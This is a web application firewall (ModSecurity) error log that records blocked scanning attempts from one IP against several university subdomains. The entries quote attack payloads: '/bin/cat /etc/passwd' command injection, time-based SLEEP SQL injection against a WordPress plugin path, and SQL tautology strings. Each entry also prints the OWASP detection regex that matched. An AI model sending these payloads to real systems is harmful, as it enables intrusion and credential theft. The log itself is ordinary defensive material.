[Tue Aug 29 11:33:37.329605 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARo80wAAAAT"]
[Tue Aug 29 11:33:37.332256 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAANsAiIAAAAD"]
[Tue Aug 29 11:33:37.336662 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARA7iAAAAAA"]
[Tue Aug 29 11:33:37.343591 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASAHa4AAAAH"]
[Tue Aug 29 11:33:37.364866 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASAHa8AAAAH"]
[Tue Aug 29 11:33:37.372021 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARLXzgAAAAQ"]
[Tue Aug 29 11:33:37.375156 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARo804AAAAT"]
[Tue Aug 29 11:33:37.379712 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARQ3-wAAAAB"]
[Tue Aug 29 11:33:37.380468 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARt--kAAAAV"]
[Tue Aug 29 11:33:37.385443 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAASBXRAAAAAM"]
[Tue Aug 29 11:33:37.386832 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAASAHbAAAAAH"]
[Tue Aug 29 11:33:38.395869 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAASBXRMAAAAM"]
[Tue Aug 29 11:33:38.423224 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAASAHbQAAAAH"]
[Tue Aug 29 11:33:38.431749 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAAOJKfsAAAAE"]
[Tue Aug 29 11:33:38.460065 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81MAAAAT"]
[Tue Aug 29 11:33:38.547382 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81cAAAAT"]
[Tue Aug 29 11:33:38.548320 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAANsAi0AAAAD"]
[Tue Aug 29 11:33:39.301359 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11I8Co-f0AAASBXRUAAAAM"]
[Tue Aug 29 11:33:39.313362 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11I8Co-f0AAAOJKf0AAAAE"]
[Tue Aug 29 11:33:39.324667 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAARo81kAAAAT"]
[Tue Aug 29 11:33:39.359129 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAAOJKf8AAAAE"]
[Tue Aug 29 11:33:39.366798 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAANsAjEAAAAD"]
[Tue Aug 29 11:33:39.375073 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAARv7UMAAAAY"]
[Tue Aug 29 11:33:40.295609 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAASAHbwAAAAH"]
[Tue Aug 29 11:33:40.298768 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPQAAAAL"]
[Tue Aug 29 11:33:40.301107 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within 